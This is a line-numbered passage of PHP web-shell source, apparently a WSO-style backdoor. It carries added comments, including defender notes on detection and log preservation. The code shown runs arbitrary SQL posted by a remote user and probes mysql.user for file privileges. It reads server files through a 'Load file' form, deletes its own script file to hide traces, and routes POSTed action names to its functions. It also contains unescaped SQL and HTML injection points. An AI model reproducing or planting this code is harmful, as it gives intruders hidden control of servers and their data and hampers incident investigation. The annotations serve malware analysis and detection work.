1820 <input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'') ."'>
1821 <td><select name='type'><option value='mysql' ";
1822     if(@$_POST['type']=='mysql')echo 'selected';
1823 echo ">MySql</option><option value='pgsql' ";
1824 if(@$_POST['type']=='pgsql')echo 'selected';
1825 echo ">PostgreSql</option></select></td>
1826 <td><input type=text name=sql_host value='". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."'></td>
1827 <td><input type=text name=sql_login value='". (empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])) ."'></td>
1828 <td><input type=text name=sql_pass value='". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."'></td><td>";
        // Plain text input for the database name, shown when there is no connection.
1829    $tmp = "<input type=text name=sql_base value=''>";
        // When connection details were posted, connect and show a <select> of database
        // names from listDbs() instead of the text input.
1830    if(isset($_POST['sql_host'])){
1831        if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
1832            switch($_POST['charset']) {
1833                case "Windows-1251": $db->setCharset('cp1251'); break;
1834                case "UTF-8": $db->setCharset('utf8'); break;
1835                case "KOI8-R": $db->setCharset('koi8r'); break;
1836                case "KOI8-U": $db->setCharset('koi8u'); break;
1837                case "cp866": $db->setCharset('cp866'); break;
1838            }
1839            $db->listDbs();
1840            echo "<select name=sql_base><option value=''></option>";
1841            while($item = $db->fetch()) {
                    // each() yields the row's first key/value pair, so $value is the first
                    // column. each() was removed in PHP 8.0.
1842                list($key, $value) = each($item);
1843                echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
1844            }
1845            echo '</select>';
1846        }
1847        else echo $tmp;
1848    }else
1849        echo $tmp;
        // Submit row plus client-side helpers: fs() clears p1/p2/p3 when the chosen
        // database differs from the posted one, st() requests a table page (p1=select,
        // p2=table, p3=page), is() inverts the tbl[] checkboxes.
1850    echo "</td>
1851               <td><input type=submit value='>>' onclick='fs(d.sf);'></td>
1852                 <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> count the number of rows</td>
1853           </tr>
1854       </table>
1855       <script>
1856             s_db='".@addslashes($_POST['sql_base'])."';
1857             function fs(f) {
1858                 if(f.sql_base.value!=s_db) { f.onsubmit = function() {};
1859                     if(f.p1) f.p1.value='';
1860                     if(f.p2) f.p2.value='';
1861                     if(f.p3) f.p3.value='';
1862                 }
1863             }
1864           function st(t,l) {
1865               d.sf.p1.value = 'select';
1866               d.sf.p2.value = t;
1867                 if(l && d.sf.p3) d.sf.p3.value = l;
1868               d.sf.submit();
1869           }
1870           function is() {
1871               for(i=0;i<d.sf.elements['tbl[]'].length;++i)
1872                   d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;
1873           }
1874       </script>";
        // Connected: render the table list, the result grid and the query box.
1875    if(isset($db) && $db->link){
1876        echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
1877            if(!empty($_POST['sql_base'])){
1878                $db->selectdb($_POST['sql_base']);
1879                echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
1880                $tbls_res = $db->listTables();
1881                while($item = $db->fetch($tbls_res)) {
1882                    list($key, $value) = each($item);
                        // Optional per-table row count (sql_count); the table name is
                        // concatenated into the statement unescaped.
1883                     if(!empty($_POST['sql_count']))
1884                         $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
1885                    $value = htmlspecialchars($value);
1886                    echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a href=# onclick=\"st('".$value."',1)\">".$value."</a>" . (empty($_POST['sql_count'])?'&nbsp;':" <small>({$n['n']})</small>") . "</nobr><br>";
1887                }
1888                echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
                    // Mode p1=select: browse table p2, 30 rows per page, page number in p3.
                    // The branch rewrites $_POST['p1'] and $_POST['p2'] so that the generic
                    // query block below executes the generated SELECT. p2 is echoed into
                    // the page and concatenated into SQL without escaping.
1889                if(@$_POST['p1'] == 'select') {
1890                    $_POST['p1'] = 'query';
1891                     $_POST['p3'] = $_POST['p3']?$_POST['p3']:1;
1892                    $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']);
1893                    $num = $db->fetch();
1894                    $pages = ceil($num['n'] / 30);
1895                     echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>".$_POST['p2']."</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int)$_POST['p3']) . ">";
1896                     echo " of $pages";
1897                     if($_POST['p3'] > 1)
1898                         echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']-1) . ")'>< Prev</a>";
1899                     if($_POST['p3'] < $pages)
1900                         echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']+1) . ")'>Next ></a>";
                         // Convert the 1-based page number to a 0-based offset multiplier.
1901                     $_POST['p3']--;
1902                    if($_POST['type']=='pgsql')
1903                        $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
1904                    else
1905                        $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
1906                    echo "<br><br>";
1907                }
                    // Mode p1=query: run p2 as SQL exactly as received and render the result
                    // set. Cell values are HTML-escaped; column names are not.
                    // NOTE(defender): what this can reach is bounded only by the privileges
                    // of the database account supplied in the form, so least-privilege
                    // application accounts limit the damage.
1908                if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) {
1909                    $db->query(@$_POST['p2']);
1910                    if($db->res !== false) {
1911                        $title = false;
1912                        echo '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">';
1913                        $line = 1;
1914                        while($item = $db->fetch())   {
                                // Emit the header row once, from the first row's keys.
1915                            if(!$title) {
1916                                echo '<tr>';
1917                                foreach($item as $key => $value)
1918                                    echo '<th>'.$key.'</th>';
1919                                reset($item);
1920                                $title=true;
1921                                echo '</tr><tr>';
1922                                $line = 2;
1923                            }
                                // Alternate the row CSS class between l1 and l2.
1924                            echo '<tr class="l'.$line.'">';
1925                            $line = $line==1?2:1;
1926                            foreach($item as $key => $value) {
1927                                if($value == null)
1928                                    echo '<td><i>null</i></td>';
1929                                else
1930                                    echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
1931                            }
1932                            echo '</tr>';
1933                        }
1934                        echo '</table>';
1935                    } else {
1936                        echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
1937                    }
1938                }
                    // Free-form query box; its submit handler copies the text into p2 of the
                    // main form with p1=query.
1939                echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";
1940                 if(!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile'))
1941                     echo htmlspecialchars($_POST['p2']);
1942                 echo "</textarea><br/><input type=submit value='Execute'>";
1943                echo "</td></tr>";
1944            }
1945            echo "</table></form><br/>";
             // mysql only: ask the server whether the current account has File_priv = 'y'
             // and show the "Load file" form only if it does.
             // NOTE(defender): this privilege probe against mysql.user, issued by a web
             // application account, is a useful signal in database audit logs.
1946             if($_POST['type']=='mysql') {
1947                 $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
1948                 if($db->fetch())
1949                     echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input  class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
1950             }
            // Mode p1=loadfile: read the path in p2 through DbClass::loadFile() and print
            // the contents HTML-escaped.
1951            if(@$_POST['p1'] == 'loadfile') {
1952                $file = $db->loadFile($_POST['p2']);
1953                echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
1954            }
        // No usable connection: print the extension's last error message.
1955    } else {
1956         echo htmlspecialchars($db->error());
1957     }
1958    echo '</div>';
        // madfooter() is defined elsewhere in the file (not visible in this section).
1959     madfooter();
1960     
1961  }
1962  
1963  function madselfrm()
1964  {
         // Self-removal action of the web shell: with POST p1=yes it deletes its own
         // script file and stops; otherwise it renders a confirmation page.
         // The regex strips a trailing "(<digits>) ..." from __FILE__ before unlink().
         // PHP appends such a suffix to __FILE__ inside eval()'d code, so presumably the
         // shell is expected to run from an eval wrapper (not visible here).
         // The `else` below binds to the inner `if` (unlink failure), not to the p1 check.
         // NOTE(defender): because the script can delete itself, a missing file is not
         // evidence that nothing ran. Preserve web-server and WAF logs, and check for
         // other artifacts, before closing an investigation.
1965     
1966     if($_POST['p1'] == 'yes')
1967        if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
1968            die('Shell has been removed');
1969        else
1970            echo 'unlink error!';
         // The page header is skipped when a deletion was attempted.
1971     if($_POST['p1'] != 'yes')
1972         madhead();
1973    echo "<div class=header><pre class=ml1 style='margin-top:5px'>";
1974     
1975     
         // Static ASCII-art banner; it carries no logic.
1976     echo "
1977     
1978                 /^\
1979        _.-`:   /   \   :'-._
1980      ,`    :  |     |  :    '.
1981    ,`       \,|     |,/       '.
1982   /           `-...-`           \
1983  :              .'.              :
1984  |             . ' .             |
1985  |             ' . '             |
1986  :              '.'              :
1987   \           ,-'''-,           /
1988    `.       /'|     |'\       ,'
1989      `._   ;  |     |  ;   _,'
1990         `-.:  |     |  :,-'
1991               |     |
1992               |     |
1993               |     |
1994               |     |
1995               |     |
1996 ";
1997     
1998     
1999     
         // The confirmation link calls g(null,null,'yes'), a client-side helper defined
         // elsewhere in the file; presumably it posts p1=yes back to this action.
2000     echo '<br>Kill Me?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
         // PHP function names are case-insensitive, so this is the same function that
         // other call sites spell madfooter().
2001    madFooter();
2002     
2003  }
2004 
2005 
2006 if( empty($_POST['a']) )
        // No action requested: fall back to $default_action when a matching mad*
        // function exists, otherwise to 'FilesMan'.
2007    if(isset($default_action) && function_exists('mad' . $default_action))
2008        $_POST['a'] = $default_action;
2009    else
2010        $_POST['a'] = 'FilesMan';
     // Dispatcher: POST field `a` names the action and the function 'mad' . a is called
     // when it exists. PHP function names are case-insensitive, so a=Sql reaches
     // madsql().
     // NOTE(defender): the action name travels in the POST body, so plain access logs
     // record only a POST to the script. Detection needs request-body inspection (for
     // example a WAF rule on the a/p1/p2/p3/c field set) or file-integrity monitoring
     // of the web root.
2011 if( !empty($_POST['a']) && function_exists('mad' . $_POST['a']) )
2012    call_user_func('mad' . $_POST['a']);
     // Runs unconditionally despite its indentation: it is not part of the `if` above.
2013    exit;
2014 ?>